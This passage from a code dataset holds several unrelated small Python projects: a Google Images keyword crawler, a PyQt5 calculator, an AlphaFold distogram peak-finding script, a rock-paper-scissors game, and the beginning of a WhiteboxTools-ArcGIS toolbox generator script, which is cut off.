"repo_name": "agustinpitaro/image_crawler",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport urllib.request\r\nimport os\r\nfrom bs4 import BeautifulSoup\r\nfrom google_images_download import google_images_download\r\n\r\ndef spider(txtpath):\r\n productlist = [] \r\n file = open(txtpath, 'r')\r\n exitList = file.readlines()\r\n file.close()\r\n \r\n productlist.extend(exitList)\r\n page = 0\r\n max_pages = len(productlist)\r\n response = google_images_download.googleimagesdownload()\r\n while page < max_pages:\r\n aux = productlist[page].rstrip()\r\n #define search params:\r\n search_params = {\r\n \"keywords\": aux,\r\n \"limit\": 15,\r\n \"size\": \"large\",\r\n \"print_urls\": True,\r\n \"output_directory\": r\"C:\\Users\\Agustin\\Desktop\\Crawler\"\r\n }\r\n absolute_image_paths = response.download(search_params)\r\n print(absolute_image_paths)\r\n page += 1 \r\n\r\n \r\ntxtpath = r'C:\\Users\\Agustin\\Desktop\\Crawler\\Input.txt'\r\nspider(txtpath)"
}
] | 1 |
Rom-Phirunronnakon/rom101
|
https://github.com/Rom-Phirunronnakon/rom101
|
a3633d4b5d3f6aff24a1510fcc97bd9e47032911
|
32f429c491fd232136f2319383fa842483e7e3b5
|
eb18ac99470b312639451ae8ad38ac88a3089bc2
|
refs/heads/main
| 2023-08-31T04:26:18.724184 | 2021-10-29T10:17:15 | 2021-10-29T10:17:15 | 417,072,032 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5780637860298157,
"alphanum_fraction": 0.6059737205505371,
"avg_line_length": 43.535823822021484,
"blob_id": "c76e4cfc34f30e52a1ea70f6de3ef6a9f14e888a",
"content_id": "162d064eb7c254b036597b83d6a192d97d812d60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14296,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 321,
"path": "/calculator.py",
"repo_name": "Rom-Phirunronnakon/rom101",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'calculator.ui'\n#\n# Created by: PyQt5 UI code generator 5.15.4\n#\n# WARNING: Any manual changes made to this file will be lost when pyuic5 is\n# run again. Do not edit this file unless you know what you are doing.\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nstart = \"0\"\nfirst = 0\nsecond = 0\noperation = \"\"\nmem = 0\nnew = 0\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(213, 343)\n MainWindow.setSizeIncrement(QtCore.QSize(0, 0))\n MainWindow.setBaseSize(QtCore.QSize(0, 0))\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setBaseSize(QtCore.QSize(0, 0))\n self.centralwidget.setObjectName(\"centralwidget\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(10, 10, 191, 51))\n font = QtGui.QFont()\n font.setPointSize(28)\n self.label.setFont(font)\n self.label.setToolTipDuration(-1)\n self.label.setLayoutDirection(QtCore.Qt.RightToLeft)\n self.label.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.label.setFrameShadow(QtWidgets.QFrame.Plain)\n self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.label.setObjectName(\"label\")\n self.memoclear = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"MC\"))\n self.memoclear.setGeometry(QtCore.QRect(10, 70, 31, 31))\n self.memoclear.setObjectName(\"memoclear\")\n self.memorecall = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"MR\"))\n self.memorecall.setGeometry(QtCore.QRect(50, 70, 31, 31))\n self.memorecall.setObjectName(\"memorecall\")\n self.memosave = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"MS\"))\n self.memosave.setGeometry(QtCore.QRect(90, 70, 31, 31))\n self.memosave.setObjectName(\"memosave\")\n self.addmemo = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"M+\"))\n self.addmemo.setGeometry(QtCore.QRect(130, 70, 31, 31))\n self.addmemo.setObjectName(\"addmemo\")\n self.minusmemo = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.memory(\"M-\"))\n self.minusmemo.setGeometry(QtCore.QRect(170, 70, 31, 31))\n self.minusmemo.setObjectName(\"minusmemo\")\n self.goback = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"GB\"))\n self.goback.setGeometry(QtCore.QRect(10, 110, 31, 31))\n self.goback.setObjectName(\"goback\")\n self.plusminus = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"PM\"))\n self.plusminus.setGeometry(QtCore.QRect(130, 110, 31, 31))\n self.plusminus.setObjectName(\"plusminus\")\n self.squareroot = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.square_it())\n self.squareroot.setGeometry(QtCore.QRect(170, 110, 31, 31))\n self.squareroot.setObjectName(\"squareroot\")\n self.clearinput = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"CE\"))\n self.clearinput.setGeometry(QtCore.QRect(50, 110, 31, 31))\n self.clearinput.setObjectName(\"clearinput\")\n self.clear = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"C\"))\n self.clear.setGeometry(QtCore.QRect(90, 110, 31, 31))\n self.clear.setObjectName(\"clear\")\n self.seven = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"7\"))\n self.seven.setGeometry(QtCore.QRect(10, 150, 31, 31))\n self.seven.setObjectName(\"seven\")\n self.divide = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.divide_it())\n self.divide.setGeometry(QtCore.QRect(130, 150, 31, 31))\n self.divide.setObjectName(\"divide\")\n self.percent = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.percent_it())\n self.percent.setGeometry(QtCore.QRect(170, 150, 31, 31))\n self.percent.setObjectName(\"percent\")\n self.eight = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"8\"))\n self.eight.setGeometry(QtCore.QRect(50, 150, 31, 31))\n self.eight.setObjectName(\"eight\")\n self.nine = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"9\"))\n self.nine.setGeometry(QtCore.QRect(90, 150, 31, 31))\n self.nine.setObjectName(\"nine\")\n self.four = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"4\"))\n self.four.setGeometry(QtCore.QRect(10, 190, 31, 31))\n self.four.setObjectName(\"four\")\n self.multiply = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.multiply_it())\n self.multiply.setGeometry(QtCore.QRect(130, 190, 31, 31))\n self.multiply.setObjectName(\"multiply\")\n self.equal = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.equal_to())\n self.equal.setGeometry(QtCore.QRect(170, 230, 31, 71))\n self.equal.setObjectName(\"equal\")\n self.five = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"5\"))\n self.five.setGeometry(QtCore.QRect(50, 190, 31, 31))\n self.five.setObjectName(\"five\")\n self.six = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"6\"))\n self.six.setGeometry(QtCore.QRect(90, 190, 31, 31))\n self.six.setObjectName(\"six\")\n self.zero = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"0\"))\n self.zero.setGeometry(QtCore.QRect(10, 270, 71, 31))\n self.zero.setObjectName(\"zero\")\n self.add = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.add_it())\n self.add.setGeometry(QtCore.QRect(130, 270, 31, 31))\n self.add.setObjectName(\"add\")\n self.point = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\".\"))\n self.point.setGeometry(QtCore.QRect(90, 270, 31, 31))\n self.point.setObjectName(\"point\")\n self.two = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"2\"))\n self.two.setGeometry(QtCore.QRect(50, 230, 31, 31))\n self.two.setObjectName(\"two\")\n self.one = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"1\"))\n self.one.setGeometry(QtCore.QRect(10, 230, 31, 31))\n self.one.setObjectName(\"one\")\n self.minus = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.minus_it())\n self.minus.setGeometry(QtCore.QRect(130, 230, 31, 31))\n self.minus.setObjectName(\"minus\")\n self.three = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"3\"))\n self.three.setGeometry(QtCore.QRect(90, 230, 31, 31))\n self.three.setObjectName(\"three\")\n self.oneover = QtWidgets.QPushButton(self.centralwidget, clicked = lambda: self.press_it(\"OO\"))\n self.oneover.setGeometry(QtCore.QRect(170, 190, 31, 31))\n self.oneover.setObjectName(\"oneover\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 213, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n def press_it(self, pressed):\n global start\n global first\n global second\n global new\n if pressed == \"C\":\n start = \"0\"\n first = 0\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"CE\":\n start = \"0\"\n second = 0\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"PM\":\n start = str(float(start)*(-1))\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"GB\":\n if len(start) > 1:\n start = start[:-1]\n self.label.setText(\"%.9s\" %start)\n elif len(start) == 1:\n start = \"0\"\n self.label.setText(\"%.9s\" %start)\n elif pressed == \"OO\":\n if start != \"0\":\n start = str(1/float(start))\n self.label.setText(\"%.9s\" %start)\n elif pressed == \".\":\n if \".\" in self.label.text():\n pass\n else:\n start += pressed\n self.label.setText(\"%.9s\" %start)\n elif start == \"0\":\n start = pressed\n self.label.setText(\"%.9s\" %start)\n else:\n start += pressed\n self.label.setText(\"%.9s\" %start)\n def add_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"+\"\n self.label.setText(\"\")\n start = \"0\"\n def minus_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"-\"\n self.label.setText(\"\")\n start = \"0\"\n def multiply_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"*\"\n self.label.setText(\"\")\n start = \"0\"\n def divide_it(self):\n global start\n global first\n global operation\n global count_point\n count_point = 0\n first = float(start)\n operation = \"/\"\n self.label.setText(\"\")\n start = \"0\"\n def equal_to(self):\n global start\n global first\n global second\n global count_point\n second = float(start)\n if operation == \"+\":\n self.label.setText(\"%.9s\" %str(first+second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n elif operation == \"-\":\n self.label.setText(\"%.9s\" %str(first-second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n elif operation == \"*\":\n self.label.setText(\"%.9s\" %str(first*second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n elif operation == \"/\" and second != 0:\n self.label.setText(\"%.9s\" %str(first/second))\n start = \"0\"\n first = 0\n second = 0\n count_point = 0\n def square_it(self):\n global start\n if float(start) >= 0:\n self.label.setText(\"%.9s\" %str(float(start)**0.5))\n start = \"0\"\n count_point = 0\n def memory(self, memcom):\n global mem\n global start\n if memcom == \"M+\":\n mem += float(start)\n start = \"\"\n self.label.setText(start)\n elif memcom == \"M-\":\n mem -= float(start)\n start = \"\"\n self.label.setText(start)\n elif memcom == \"MC\":\n mem = 0\n elif memcom == \"MR\":\n self.label.setText(str(mem))\n elif memcom == \"MS\":\n mem = mem \n def percent_it(self):\n global operation\n if operation == \"+\":\n self.label.setText(\"%.9s\" %str(first*(1+float(start)/100)))\n operation = \"\"\n elif operation == \"-\":\n self.label.setText(\"%.9s\" %str(first*(1-float(start)/100)))\n operation = \"\"\n elif operation == \"*\":\n self.label.setText(\"%.9s\" %str(first*float(start)/100))\n operation = \"\"\n elif operation == \"/\":\n self.label.setText(\"%.9s\" %str(first*100/float(start)))\n operation = \"\"\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Calculator\"))\n self.label.setText(_translate(\"MainWindow\", \"0\"))\n self.memoclear.setText(_translate(\"MainWindow\", \"MC\"))\n self.memorecall.setText(_translate(\"MainWindow\", \"MR\"))\n self.memosave.setText(_translate(\"MainWindow\", \"MS\"))\n self.addmemo.setText(_translate(\"MainWindow\", \"M+\"))\n self.minusmemo.setText(_translate(\"MainWindow\", \"M-\"))\n self.goback.setText(_translate(\"MainWindow\", \"<--\"))\n self.plusminus.setText(_translate(\"MainWindow\", \"+/-\"))\n self.squareroot.setText(_translate(\"MainWindow\", \"sqrt\"))\n self.clearinput.setText(_translate(\"MainWindow\", \"CE\"))\n self.clear.setText(_translate(\"MainWindow\", \"C\"))\n self.seven.setText(_translate(\"MainWindow\", \"7\"))\n self.divide.setText(_translate(\"MainWindow\", \"/\"))\n self.percent.setText(_translate(\"MainWindow\", \"%\"))\n self.eight.setText(_translate(\"MainWindow\", \"8\"))\n self.nine.setText(_translate(\"MainWindow\", \"9\"))\n self.four.setText(_translate(\"MainWindow\", \"4\"))\n self.multiply.setText(_translate(\"MainWindow\", \"*\"))\n self.equal.setText(_translate(\"MainWindow\", \"=\"))\n self.five.setText(_translate(\"MainWindow\", \"5\"))\n self.six.setText(_translate(\"MainWindow\", \"6\"))\n self.zero.setText(_translate(\"MainWindow\", \"0\"))\n self.add.setText(_translate(\"MainWindow\", \"+\"))\n self.point.setText(_translate(\"MainWindow\", \".\"))\n self.two.setText(_translate(\"MainWindow\", \"2\"))\n self.one.setText(_translate(\"MainWindow\", \"1\"))\n self.minus.setText(_translate(\"MainWindow\", \"-\"))\n self.three.setText(_translate(\"MainWindow\", \"3\"))\n self.oneover.setText(_translate(\"MainWindow\", \"1/x\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n"
}
] | 1 |
bjornwallner/AF_flex
|
https://github.com/bjornwallner/AF_flex
|
3633bbcb8f16e1eef875f132582f088cdae11072
|
6b5bacc2899a4aa62d974f07e1626b3d8ad6bd78
|
2f11805abdc6594a419e5903ad0b8e026ffe1d77
|
refs/heads/main
| 2023-08-03T01:50:56.934643 | 2021-09-30T10:12:47 | 2021-09-30T10:12:47 | 411,991,814 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5701708793640137,
"alphanum_fraction": 0.5833764672279358,
"avg_line_length": 23.5732479095459,
"blob_id": "593af75a392b5a4663ac5defa7fcb7b81616cfe9",
"content_id": "2a78dd86605998cd3dcb7d0d1169b8d69892006a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3862,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 157,
"path": "/distogram.py",
"repo_name": "bjornwallner/AF_flex",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nfrom numpy import NaN, Inf, arange, isscalar, asarray, array\n\ndef peakdet(v, delta, x = None):\n \"\"\"\n Converted from MATLAB script at http://billauer.co.il/peakdet.html\n \n Returns two arrays\n \n function [maxtab, mintab]=peakdet(v, delta, x)\n %PEAKDET Detect peaks in a vector\n % [MAXTAB, MINTAB] = PEAKDET(V, DELTA) finds the local\n % maxima and minima (\"peaks\") in the vector V.\n % MAXTAB and MINTAB consists of two columns. Column 1\n % contains indices in V, and column 2 the found values.\n % \n % With [MAXTAB, MINTAB] = PEAKDET(V, DELTA, X) the indices\n % in MAXTAB and MINTAB are replaced with the corresponding\n % X-values.\n %\n % A point is considered a maximum peak if it has the maximal\n % value, and was preceded (to the left) by a value lower by\n % DELTA.\n \n % Eli Billauer, 3.4.05 (Explicitly not copyrighted).\n % This function is released to the public domain; Any use is allowed.\n \n \"\"\"\n maxtab = []\n mintab = []\n \n if x is None:\n x = arange(len(v))\n \n v = asarray(v)\n \n if len(v) != len(x):\n sys.exit('Input vectors v and x must have same length')\n \n if not isscalar(delta):\n sys.exit('Input argument delta must be a scalar')\n \n if delta <= 0:\n sys.exit('Input argument delta must be positive')\n \n mn, mx = Inf, -Inf\n mnpos, mxpos = NaN, NaN\n \n lookformax = True\n \n for i in arange(len(v)):\n this = v[i]\n if this > mx:\n mx = this\n mxpos = x[i]\n if this < mn:\n mn = this\n mnpos = x[i]\n \n if lookformax:\n if this < mx-delta:\n maxtab.append((mxpos, mx))\n mn = this\n mnpos = x[i]\n lookformax = False\n else:\n if this > mn+delta:\n mintab.append((mnpos, mn))\n mx = this\n mxpos = x[i]\n lookformax = True\n\n return array(maxtab), array(mintab)\n\n\n# In[22]:\n\n\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\ndef softmax(x):\n f_x = np.exp(x) / np.sum(np.exp(x))\n return f_x\ndef expit(x):\n\n f_x=1/(1+np.exp(-x)) \n return f_x\n\npickle_file='result_model_1_msas1_chainbreak_offset200_recycles3_1.pkl'\nresults=pickle.load(open(pickle_file,'rb'))\nprint(results['distogram'].keys())\nbin_edges=results['distogram']['bin_edges']\nbin_size=bin_edges[1]-bin_edges[0]\n#convert the bin_edges to bin_centers\nprint(bin_edges)\nx=bin_edges+bin_size/2\nprint(x)\nprint(bin_size)\n#Add the first bin center to the begining of x to complete the conversion\nfirst_bin=bin_edges[0]-bin_size/2\nx=np.insert(x,0,first_bin)\nprint(bin_edges)\n\n\n# In[35]:\n\n\ndistogram=results['distogram']['logits']\nprint(results['distogram']['logits'].shape)\nprint(len(x))\n#Took a random position that I know was in contact just to get something\npos1=5\npos2=28\ny=distogram[pos1-1][pos2-1]\n#the distogram are logits and need to be converted to probablity using softmax\n#\nprob=softmax(y)\n#prob2=expit(y)\n#print(y)\n#print(prob)\nplt.plot(x,prob)\n#plt.plot(x,prob2)\n#plt.plot(x,y_S)\nplt.show()\n(maxima,minima)=peakdet(prob,0.03,x)\nmaxima\n\n\n# In[51]:\n\n\n#Example Search for all maximas\nN=distogram.shape[0] #this is the length of the pdb\n\nfor i in range(N):\n for j in range(N):\n if j<=i: #skipping symmetric pairs\n continue\n prob=softmax(distogram[i][j])\n #prob=expit(distogram[i][j])\n (maxima,minima)=peakdet(prob,0.03,x)\n n=len(maxima)\n if(n >1):\n print(f'Found {n} maxima for pair {i+1},{j+1}: {maxima.flatten().tolist()}')\n #print(len(maxima))\n print(maxima.shape)\n\n\n# In[ ]:\n\n\n\n\n"
}
] | 1 |
shivamtiwari12032001/Rock-Paper_Scissor
|
https://github.com/shivamtiwari12032001/Rock-Paper_Scissor
|
7b3ad3f191d23a5db1e2cb8c841bef624ce3a483
|
31ae2c24ac441e39eab19223e06ee2c15197541f
|
c02b58b038d8e73ee6278189171cc4fc59a4ab4b
|
refs/heads/master
| 2023-03-14T23:34:59.756529 | 2021-03-22T14:26:49 | 2021-03-22T14:26:49 | 349,501,580 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5870535969734192,
"alphanum_fraction": 0.5870535969734192,
"avg_line_length": 28.933332443237305,
"blob_id": "fbcd2b8d1e81f5a4d23f4a7b607f0d54c442d264",
"content_id": "3fcae9d2a4b86af2fe6673754b105c77157b1d51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 448,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 15,
"path": "/main.py",
"repo_name": "shivamtiwari12032001/Rock-Paper_Scissor",
"src_encoding": "UTF-8",
"text": "import random\ndef play():\n user=input(\"enter your choice?? 'r' for rock 's' for scissor or 'p' for paper:\\n \")\n computer=random.choice([\"r\",\"s\",\"p\"])\n if user==computer:\n return \"It\\\"s tie\"\n if is_win(user,computer):\n return \"You won\"\n return \"you lost\"\n\n\ndef is_win(user,opponent):\n if(user==\"r\" and opponent==\"s\")or (user==\"p\" and opponent==\"r\") or (user==\"s\" and opponent==\"p\"):\n return True\nprint(play())"
},
{
"alpha_fraction": 0.761904776096344,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 20,
"blob_id": "2c7e5bc88d0a5eff08a253376c53955cf1b0e2c1",
"content_id": "fedf23021efd0375f1672f932895c29f6d68efe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/README.md",
"repo_name": "shivamtiwari12032001/Rock-Paper_Scissor",
"src_encoding": "UTF-8",
"text": "# Rock-Paper_Scissor\n"
}
] | 2 |
TrendingTechnology/WhiteboxTools-ArcGIS
|
https://github.com/TrendingTechnology/WhiteboxTools-ArcGIS
|
77f70ab029d8002ac2d3590baac7bff245820664
|
df72dc226e4c5bb9870a79c8af2cb8d2f78ed1f0
|
44ab3b2e14d18c987cc97199585a58f0c27a26d8
|
refs/heads/master
| 2023-06-19T13:32:43.687641 | 2021-07-20T19:13:32 | 2021-07-20T19:13:32 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.547406792640686,
"alphanum_fraction": 0.5500813722610474,
"avg_line_length": 36.938236236572266,
"blob_id": "1f976f750f45d185ea564803ede5ac2469dc494f",
"content_id": "07a6a5db3f6c9ed14a06e89bce6e705456aa8035",
"detected_licenses": [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25798,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 680,
"path": "/WBT/PRE/automation.py",
"repo_name": "TrendingTechnology/WhiteboxTools-ArcGIS",
"src_encoding": "UTF-8",
"text": "\n##################################################################\n# Steps for updating WhiteboxTools-ArcGIS\n# Step 1 - Delete the existing develop branch: git branch -D develop \n# Step 2 - Create a new develop branch: git checkout -b develop\n# Step 3 - Delete the old WhiteboxTools_win_amd64.zip in the root folder if needed\n# Step 4 - Run automation.py\n# Step 5 - Commit and push changes\n# Step 6 - Merge pull request on GitHub\n# Step 7 - Switch to master branch and pull updates: git checkout master | git pull\n##################################################################\n\nimport os \nimport re\nimport shutil\nimport ast\nimport whitebox\nimport urllib.request\nfrom zipfile import ZipFile\n\nwbt = whitebox.WhiteboxTools()\n\ndef to_camelcase(name):\n '''\n Convert snake_case name to CamelCase name \n '''\n return ''.join(x.title() for x in name.split('_'))\n\ndef to_label(name):\n '''\n Convert snake_case name to Title case label \n '''\n return ' '.join(x.title() for x in name.split('_'))\n\ndef to_snakecase(name):\n '''\n Convert CamelCase name to snake_case name \n '''\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef write_header(file_path, tool_list):\n '''\n Generate Python script header for ArcGIS Python Toolbox \n '''\n f_header = open(file_path, \"w\")\n f_header.write(\"import arcpy\\n\")\n f_header.write(\"import os\\n\")\n f_header.write(\"import webbrowser\\n\")\n f_header.write(\"from WBT.whitebox_tools import WhiteboxTools\\n\")\n f_header.write('if sys.version_info < (3, 0):\\n')\n f_header.write(' from StringIO import StringIO\\n')\n f_header.write('else:\\n')\n f_header.write(' from io import StringIO\\n\\n')\n f_header.write(\"wbt = WhiteboxTools()\\n\")\n # ValueList (Dropdown List) for About WhiteboxTools functions (e.g., Run Tool, View Code)\n f_header.write(\"tool_labels = []\\n\\n\") \n tool_list.sort()\n for tool in tool_list:\n f_header.write('tool_labels.append(\"{}\")\\n'.format(tool))\n f_header.write(\"\\n\\n\")\n f_header.close()\n\n\ndef get_tool_params(tool_name):\n '''\n Convert tool parameters output string to a dictionary \n '''\n out_str = wbt.tool_parameters(tool_name)\n start_index = out_str.index('[') + 1\n if \"EXE_NAME\" in out_str:\n end_index = out_str.rfind(\"]\") \n else:\n end_index = len(out_str.strip()) - 2\n params = out_str[start_index : end_index]\n if \"EXE_NAME\" in out_str:\n sub_params = params.split('{\"default_value\"')\n else:\n sub_params = params.split('{\"name\"')\n param_list = []\n\n for param in sub_params:\n param = param.strip()\n if len(param) > 0:\n if \"EXE_NAME\" in out_str:\n if not param.endswith('},'):\n item = '\"default_value\"' + param[:-1] + ','\n else:\n item = '\"default_value\"' + param[:-2] + ','\n name_start = item.find('\"name\"')\n name_end = item.find(\",\", name_start) + 1\n name = item[name_start: name_end]\n flags_start = item.find('\"flags\"')\n flags_end = item.find('],', flags_start) + 2\n flags = item[flags_start: flags_end]\n desc_start = item.find('\"description\"')\n desc_end = item.find('\",', desc_start) + 2\n desc = item[desc_start: desc_end]\n ptype_start = item.find('\"parameter_type\"')\n ptype_end = len(item) + 1\n ptype = item[ptype_start: ptype_end]\n default_start = item.find('\"default_value\"')\n default_end = item.find(',', default_start) + 1\n default = item[default_start: default_end]\n optional_start = item.find('\"optional\"')\n optional_end = item.find(',', optional_start) + 1\n optional = item[optional_start: optional_end]\n item = name + flags + desc + ptype + default + optional\n else:\n item = '\"name\"' + param\n item = item[ : item.rfind(\"}\")].strip()\n\n param_list.append(item)\n\n params_dict = {}\n for item in param_list:\n param_dict = {}\n item = item.replace(\" (optional)\", \"\")\n index_name = item.find(\"name\")\n index_flags = item.find(\"flags\")\n index_description = item.find(\"description\")\n index_parameter_type = item.find(\"parameter_type\")\n index_default_value = item.find(\"default_value\")\n index_optional = item.find(\"optional\")\n\n name = item[index_name - 1 : index_flags - 2].replace('\"name\":', '')\n name = name.replace('\"', '')\n param_dict['name'] = name\n\n flags = item[index_flags - 1 : index_description -2].replace('\"flags\":', '')\n \n if (\"\\\"-i\\\"\" in flags) and (\"--inputs\" in flags) :\n flags = \"inputs\"\n elif (\"\\\"-i\\\"\" in flags) and (\"--input\" in flags) and (\"--dem\" in flags) and (tool_name.lower() != 'sink'):\n flags = \"dem\" \n elif (\"\\\"-i\\\"\" in flags) and (\"--input\" in flags) :\n flags = \"i\"\n elif flags.count(\"--\") == 1 :\n flags = flags.split('--')[1][: -2]\n elif flags.count(\"--\") == 2:\n flags = flags.split('--')[2][: -2]\n else:\n flags = flags.split('-')[1][: -2]\n\n param_dict['flags'] = flags\n\n desc = item[index_description - 1 : index_parameter_type - 2].replace('\"description\":', '')\n desc = desc.replace('\"', '')\n param_dict['description'] = desc\n\n param_type = item[index_parameter_type - 1 : index_default_value - 2].replace('\"parameter_type\":', '')\n try:\n param_type = ast.literal_eval(param_type)\n except:\n pass\n\n param_dict['parameter_type'] = param_type\n\n default_value = item[index_default_value - 1 : index_optional - 2].replace('\"default_value\":', '')\n param_dict['default_value'] = default_value\n\n optional = item[index_optional - 1 :].replace('\"optional\":', '')\n param_dict['optional'] = optional\n\n params_dict[flags] = param_dict\n\n # if tool_name == 'Divide':\n # print(\"start debugging\")\n\n return params_dict\n\n\n# def get_param_types(tools):\n# '''\n# Get unique parameter types \n# '''\n# parameter_types = []\n# for tool in tools:\n# params = tools[tool]['parameters']\n# for param in params:\n# param_type = params[param]['parameter_type']\n# if param_type not in parameter_types:\n# parameter_types.append(param_type)\n# return parameter_types\n\n\ndef generate_tool_template(tool):\n '''\n Generate function block of each tool for the toolbox \n '''\n tool_params = []\n for index, item in enumerate(tool['parameters']):\n if index < 0:\n tool_params.append(item)\n else:\n item_dup = \"{}={}\".format(item, item)\n tool_params.append(item_dup)\n\n lines = []\n lines.append('class {}(object):\\n'.format(tool['name']))\n lines.append(' def __init__(self):\\n')\n lines.append(' self.label = \"{}\"\\n'.format(tool['label']))\n lines.append(' self.description = \"{}\"\\n'.format(tool['description']))\n lines.append(' self.category = \"{}\"\\n\\n'.format(tool['category']))\n lines.append(' def getParameterInfo(self):\\n')\n # Loop through parameters \n lines.append(define_tool_params(tool['parameters']))\n lines.append(' return params\\n\\n')\n lines.append(' def updateParameters(self, parameters):\\n')\n lines.append(' return\\n\\n')\n lines.append(' def updateMessages(self, parameters):\\n')\n lines.append(' for param in parameters:\\n')\n lines.append(' param_str = param.valueAsText\\n')\n lines.append(' if param_str is not None:\\n')\n lines.append(' try:\\n')\n lines.append(' desc = arcpy.Describe(param_str)\\n')\n lines.append(' if (\".gdb\\\\\\\\\" in desc.catalogPath) or (\".mdb\\\\\\\\\" in desc.catalogPath):\\n')\n lines.append(' param.setErrorMessage(\"Datasets stored in a Geodatabase are not supported.\")\\n')\n lines.append(' except:\\n')\n lines.append(' param.clearMessage()\\n')\n lines.append(' return\\n\\n')\n lines.append(' def execute(self, parameters, messages):\\n')\n # Access parameters throught parameters[x].valueAsText\n lines.append(define_execute(tool['parameters']))\n # redirect standard output to tool dialogue\n lines.append(' old_stdout = sys.stdout\\n')\n lines.append(' result = StringIO()\\n')\n lines.append(' sys.stdout = result\\n')\n\n # line = ' wbt.{}({})\\n'.format(to_snakecase(tool['name']), ', '.join(tool['parameters']).replace(\", class,\", \", cls,\"))\n line = ' wbt.{}({})\\n'.format(to_snakecase(tool['name']), ', '.join(tool_params).replace(\", class=class,\", \", cls=cls,\"))\n\n # Deal with name conflict with reserved Python functions (and, or, not)\n if tool['name'] == \"And\":\n line = line.replace(\"and\", \"And\")\n elif tool['name'] == \"Or\":\n line = line.replace(\"or\", \"Or\")\n elif tool['name'] == \"Not\":\n line = 